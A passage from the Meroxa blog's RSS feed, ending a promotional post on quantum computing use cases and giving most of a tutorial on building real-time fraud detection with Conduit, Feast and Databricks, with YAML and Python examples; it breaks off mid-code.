&lt;p&gt;Quantum computing is transforming financial modeling by &lt;strong&gt;optimizing risk assessment&lt;/strong&gt; and &lt;strong&gt;detecting fraudulent transactions&lt;/strong&gt; in real time.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/financial-risk.png&quot; alt=&quot;ai-failure-points.png&quot;&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Meroxa Use Case:&lt;/strong&gt; Streaming transaction data into quantum-powered Monte Carlo simulations for fraud detection.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;2. Pharmaceuticals &amp;#x26; Drug Discovery&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Pharma companies are using quantum computing for &lt;strong&gt;molecular simulation&lt;/strong&gt;, drastically reducing time for &lt;strong&gt;drug discovery&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/pharmaceutical.png&quot; alt=&quot;ai-failure-points.png&quot;&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Meroxa Use Case:&lt;/strong&gt; Real-time movement of &lt;strong&gt;genomic datasets&lt;/strong&gt; between research labs and quantum simulators.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;3. Logistics &amp;#x26; Supply Chain Optimization&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Quantum algorithms are solving &lt;strong&gt;route optimization&lt;/strong&gt; for global supply chains.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/logistics.png&quot; alt=&quot;ai-failure-points.png&quot;&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Meroxa Use Case:&lt;/strong&gt; &lt;strong&gt;Streaming IoT sensor data&lt;/strong&gt; into quantum models for predictive logistics.&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;&lt;strong&gt;4. Cybersecurity &amp;#x26; Cryptography&lt;/strong&gt;&lt;/h4&gt;
&lt;p&gt;Quantum computing will &lt;strong&gt;break traditional encryption&lt;/strong&gt;, but also introduce &lt;strong&gt;quantum-safe cryptographic methods&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/cybersecurity.png&quot; alt=&quot;ai-failure-points.png&quot;&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Meroxa Use Case:&lt;/strong&gt; Secure, &lt;strong&gt;real-time key exchange pipelines&lt;/strong&gt; for quantum encryption systems.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Future of Meroxa in Quantum Computing&lt;/h3&gt;
&lt;p&gt;As quantum computing moves toward &lt;strong&gt;commercial adoption&lt;/strong&gt;, Meroxa is committed to &lt;strong&gt;expanding its integrations&lt;/strong&gt; with:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Quantum-native data connectors&lt;/strong&gt; for IBM, Google, and D-Wave.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Error correction pipelines&lt;/strong&gt; to ensure data reliability.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Real-time quantum event processing&lt;/strong&gt; for AI-driven applications.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3&gt;Conclusion&lt;/h3&gt;
&lt;p&gt;Meroxa provides &lt;strong&gt;seamless, high-speed data streaming&lt;/strong&gt; for organizations integrating quantum computing into their architectures. By &lt;strong&gt;bridging classical and quantum systems&lt;/strong&gt;, Meroxa ensures businesses can unlock &lt;strong&gt;new computational capabilities&lt;/strong&gt; without disrupting existing workflows. Follow us on &lt;a href=&quot;https://twitter.com/meroxadata&quot;&gt;Twitter&lt;/a&gt;, &lt;a href=&quot;https://www.linkedin.com/company/meroxa&quot;&gt;LinkedIn&lt;/a&gt;, and &lt;a href=&quot;https://youtube.com/@meroxadata143&quot;&gt;YouTube&lt;/a&gt; for more insights and updates!&lt;/p&gt;</content:encoded></item><item><title><![CDATA[Real Time Fraud Detection with Meroxa, Feast, and Databricks]]></title><description><![CDATA[Discover how **Meroxa, Feast, and Databricks** power **real-time fraud detection** by integrating **streaming data, AI-driven feature stores, and scalable analytics**. This blog explores how businesses can **prevent fraud instantly**, leveraging **real-time data pipelines, machine learning models, and predictive analytics** to enhance security and compliance. ]]></description><link>https://meroxa.com/blog/real-time-fraud-detection-with-meroxa-feast-and-databricks</link><guid isPermaLink="false">https://meroxa.com/blog/real-time-fraud-detection-with-meroxa-feast-and-databricks</guid><dc:creator><![CDATA[DeVaris Brown]]></dc:creator><pubDate>Mon, 03 Mar 2025 23:26:00 GMT</pubDate><content:encoded>&lt;p&gt;Financial institutions face an ever-present challenge in detecting fraudulent transactions quickly. Today, we’ll showcase how &lt;strong&gt;Conduit&lt;/strong&gt; and &lt;strong&gt;Feast&lt;/strong&gt; can seamlessly work with &lt;strong&gt;Databricks&lt;/strong&gt; to build a scalable, real-time fraud detection system.&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Conduit from Meroxa&lt;/strong&gt;: A high-performance platform for data ingestion and transformation, complete with built-in processors.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Feast&lt;/strong&gt;: An open-source &lt;strong&gt;feature store&lt;/strong&gt; for managing features in both offline (batch) and online (low-latency) contexts.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Databricks&lt;/strong&gt;: For large-scale data processing, model training, and real-time serving (via MLflow Model Serving or custom endpoints).&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;Why Conduit?&lt;/h3&gt;
&lt;p&gt;Conduit offers a lightweight yet powerful way to stream and transform your data with minimal overhead. Key benefits:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Declarative Pipelines&lt;/strong&gt;: Define sources, sinks, and transformations via a YAML or JSON config.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Built-in Processors&lt;/strong&gt;: Modify, enrich, or filter records in flight (e.g., masking sensitive PII).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;High Throughput&lt;/strong&gt;: Designed for real-time data pipelines at scale.&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;Below is a diagram illustrating how Conduit and Feast integrate with Databricks for fraud detection:&lt;/p&gt;
&lt;p&gt;&lt;img src=&quot;https://meroxa.com/img/conduit-fraud.png&quot; alt=&quot;ai-failure-points.png&quot;&gt;&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;strong&gt;Conduit&lt;/strong&gt; ingests streaming data from transaction sources (e.g., Kafka, databases).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Built-in processors&lt;/strong&gt; within Conduit enrich/cleanse data.&lt;/li&gt;
&lt;li&gt;Conduit writes &lt;strong&gt;offline features&lt;/strong&gt; to the &lt;strong&gt;Feast Offline Store&lt;/strong&gt; (could be S3 or a relational warehouse).&lt;/li&gt;
&lt;li&gt;Conduit can simultaneously push the &lt;strong&gt;latest features&lt;/strong&gt; to the &lt;strong&gt;Feast Online Store&lt;/strong&gt; (like Redis) for low-latency inference.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Databricks&lt;/strong&gt; reads from the Feast offline store, trains the fraud model, and registers it in &lt;strong&gt;MLflow&lt;/strong&gt;.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Databricks Model Serving&lt;/strong&gt; (or a custom endpoint) hosts the model for real-time scoring.&lt;/li&gt;
&lt;li&gt;Requests for fraud scoring read any updated features from Feast’s &lt;strong&gt;online store&lt;/strong&gt;.&lt;/li&gt;
&lt;/ol&gt;
&lt;hr&gt;
&lt;h3&gt;Step 1: Conduit Data Pipeline&lt;/h3&gt;
&lt;h4&gt;1.1 Conduit Configuration&lt;/h4&gt;
&lt;p&gt;Assume we have a &lt;strong&gt;Kafka&lt;/strong&gt; topic (&lt;code class=&quot;language-text&quot;&gt;bank_transactions&lt;/code&gt;) containing real-time financial transactions and a &lt;strong&gt;PostgreSQL&lt;/strong&gt; database with watchlist data. Below is an example &lt;strong&gt;conduit.config.yaml&lt;/strong&gt; snippet that ingests from Kafka and writes to S3 (for offline store) and Redis (for online store), using Feast as the consumer reference.&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;yaml
CopyEdit
&lt;span class=&quot;token key atrule&quot;&gt;version&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;v1&quot;&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;sources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;kafkaTransactions&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; kafka
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;brokers&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;broker1:9092,broker2:9092&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;topics&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;bank_transactions&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;consumerGroupID&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;fraud-cg&quot;&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; parseJSON
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; processor.json
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;action&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;unmarshal&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;field&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;value&quot;&lt;/span&gt;

  &lt;span class=&quot;token punctuation&quot;&gt;-&lt;/span&gt; &lt;span class=&quot;token key atrule&quot;&gt;name&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; addWatchlistFlag
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; processor.lookup
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Hypothetical config that references a PostgreSQL watchlist&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;dataStore&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;postgresql://user:pass@db.example.com:5432/bankdb&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;sourceField&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;value.account_id&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;targetField&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;value.watchlist_flag&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;query&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;SELECT account_id, true as watchlist_flag FROM watchlist WHERE account_id = $1&quot;&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;sinks&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token comment&quot;&gt;# Sink to offline store (S3, which Feast can read from)&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;s3Offline&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; s3
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;bucket&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;feast-offline-store&quot;&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;region&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;us-east-1&quot;&lt;/span&gt;
      &lt;span class=&quot;token comment&quot;&gt;# Additional config (credentials, etc.)&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;

  &lt;span class=&quot;token comment&quot;&gt;# Sink to online store (e.g., Redis for Feast)&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;redisOnline&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; redis
    &lt;span class=&quot;token key atrule&quot;&gt;settings&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
      &lt;span class=&quot;token key atrule&quot;&gt;address&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;redis-host:6379&quot;&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;pipelines&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;myFraudPipeline&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;sources&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;kafkaTransactions&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;processors&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;parseJSON&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;addWatchlistFlag&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
    &lt;span class=&quot;token key atrule&quot;&gt;sinks&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;s3Offline&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;redisOnline&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Explanation&lt;/strong&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;parseJSON&lt;/strong&gt;: A &lt;strong&gt;built-in processor&lt;/strong&gt; that unmarshals the JSON in the Kafka “value” field into a structured object.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;addWatchlistFlag&lt;/strong&gt;: Another built-in processor that queries your PostgreSQL watchlist table to see if &lt;code class=&quot;language-text&quot;&gt;account_id&lt;/code&gt; is flagged. The result is appended as &lt;code class=&quot;language-text&quot;&gt;value.watchlist_flag = true/false&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;The pipeline then writes this enriched stream to &lt;strong&gt;two sinks&lt;/strong&gt;:
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;s3Offline&lt;/strong&gt;: So that &lt;strong&gt;Feast&lt;/strong&gt; or &lt;strong&gt;Databricks&lt;/strong&gt; can consume it in batch.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;redisOnline&lt;/strong&gt;: For near real-time lookups (Feast online store).&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;/ul&gt;
&lt;h4&gt;1.2 Running Conduit&lt;/h4&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;bash&quot;&gt;&lt;pre class=&quot;language-bash&quot;&gt;&lt;code class=&quot;language-bash&quot;&gt;conduit run &lt;span class=&quot;token parameter variable&quot;&gt;--config&lt;/span&gt; conduit.config.yaml&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Conduit starts streaming transactions from Kafka, applying processors, and writing to both S3 and Redis. Now we have data continuously updating:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Offline store&lt;/strong&gt;: Historical features in S3 (or columns/partitions for transaction data).&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Online store&lt;/strong&gt;: Real-time features in Redis keyed by &lt;code class=&quot;language-text&quot;&gt;account_id&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;Step 2: Managing Features with Feast&lt;/h3&gt;
&lt;h4&gt;2.1 Feast Repository Setup&lt;/h4&gt;
&lt;p&gt;In your &lt;code class=&quot;language-text&quot;&gt;feature_store.yaml&lt;/code&gt;, configure S3 as the &lt;strong&gt;offline store&lt;/strong&gt; and Redis as the &lt;strong&gt;online store&lt;/strong&gt;:&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;yaml&quot;&gt;&lt;pre class=&quot;language-yaml&quot;&gt;&lt;code class=&quot;language-yaml&quot;&gt;&lt;span class=&quot;token key atrule&quot;&gt;project&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;fraud_project&quot;&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;registry&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;s3://my-bucket/feast/registry.db&quot;&lt;/span&gt;
&lt;span class=&quot;token key atrule&quot;&gt;provider&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;local&quot;&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;offline_store&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; file
  &lt;span class=&quot;token key atrule&quot;&gt;path&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;s3://feast-offline-store&quot;&lt;/span&gt;   &lt;span class=&quot;token comment&quot;&gt;# where Conduit is writing&lt;/span&gt;

&lt;span class=&quot;token key atrule&quot;&gt;online_store&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt;
  &lt;span class=&quot;token key atrule&quot;&gt;type&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; redis
  &lt;span class=&quot;token key atrule&quot;&gt;connection_string&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token string&quot;&gt;&quot;redis-host:6379&quot;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;h4&gt;2.2 Define Fraud Feature Views&lt;/h4&gt;
&lt;p&gt;Example: “transaction_features.py”&lt;/p&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; feast &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; Entity&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; FeatureView&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Field
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; feast&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;types &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; Float32&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Int32&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; Bool

account &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; Entity&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;name&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;account_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; join_keys&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;account_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

transaction_feature_view &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; FeatureView&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;
    name&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;transaction_features&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    entities&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;account&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    ttl&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;None&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    schema&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;
        Field&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;name&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;amount&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; dtype&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;Float32&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        Field&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;name&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;watchlist_flag&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; dtype&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;Bool&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        Field&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;name&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;transaction_count_last_10m&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt; dtype&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;Int32&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
        &lt;span class=&quot;token comment&quot;&gt;# ...&lt;/span&gt;
    &lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    online&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;True&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
    offline&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token boolean&quot;&gt;True&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;When new transactions arrive (through Conduit), they land in S3 and Redis in near real-time. With &lt;strong&gt;Feast&lt;/strong&gt;, you can:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Materialize&lt;/strong&gt; historical data from S3 for offline training.&lt;/li&gt;
&lt;li&gt;Keep the same features &lt;strong&gt;fresh&lt;/strong&gt; in Redis for online inference.&lt;/li&gt;
&lt;/ul&gt;
&lt;hr&gt;
&lt;h3&gt;Step 3: Training a Fraud Detection Model in Databricks&lt;/h3&gt;
&lt;h4&gt;3.1 Pull Historical Features&lt;/h4&gt;
&lt;div class=&quot;gatsby-highlight&quot; data-language=&quot;python&quot;&gt;&lt;pre class=&quot;language-python&quot;&gt;&lt;code class=&quot;language-python&quot;&gt;&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; feast
&lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; pandas &lt;span class=&quot;token keyword&quot;&gt;as&lt;/span&gt; pd
&lt;span class=&quot;token keyword&quot;&gt;from&lt;/span&gt; feast &lt;span class=&quot;token keyword&quot;&gt;import&lt;/span&gt; FeatureStore

fs &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; FeatureStore&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;repo_path&lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt;&lt;span class=&quot;token string&quot;&gt;&quot;path/to/feature_repo&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;)&lt;/span&gt;

&lt;span class=&quot;token comment&quot;&gt;# Example: create an entity DataFrame with known fraud labels for training&lt;/span&gt;
entity_df &lt;span class=&quot;token operator&quot;&gt;=&lt;/span&gt; pd&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;DataFrame&lt;span class=&quot;token punctuation&quot;&gt;(&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;{&lt;/span&gt;
    &lt;span class=&quot;token string&quot;&gt;&quot;account_id&quot;&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;:&lt;/span&gt; &lt;span class=&quot;token punctuation&quot;&gt;[&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;.&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;]&lt;/span&gt;&lt;span class=&quot;token punctuation&quot;&gt;,&lt;/span&gt;
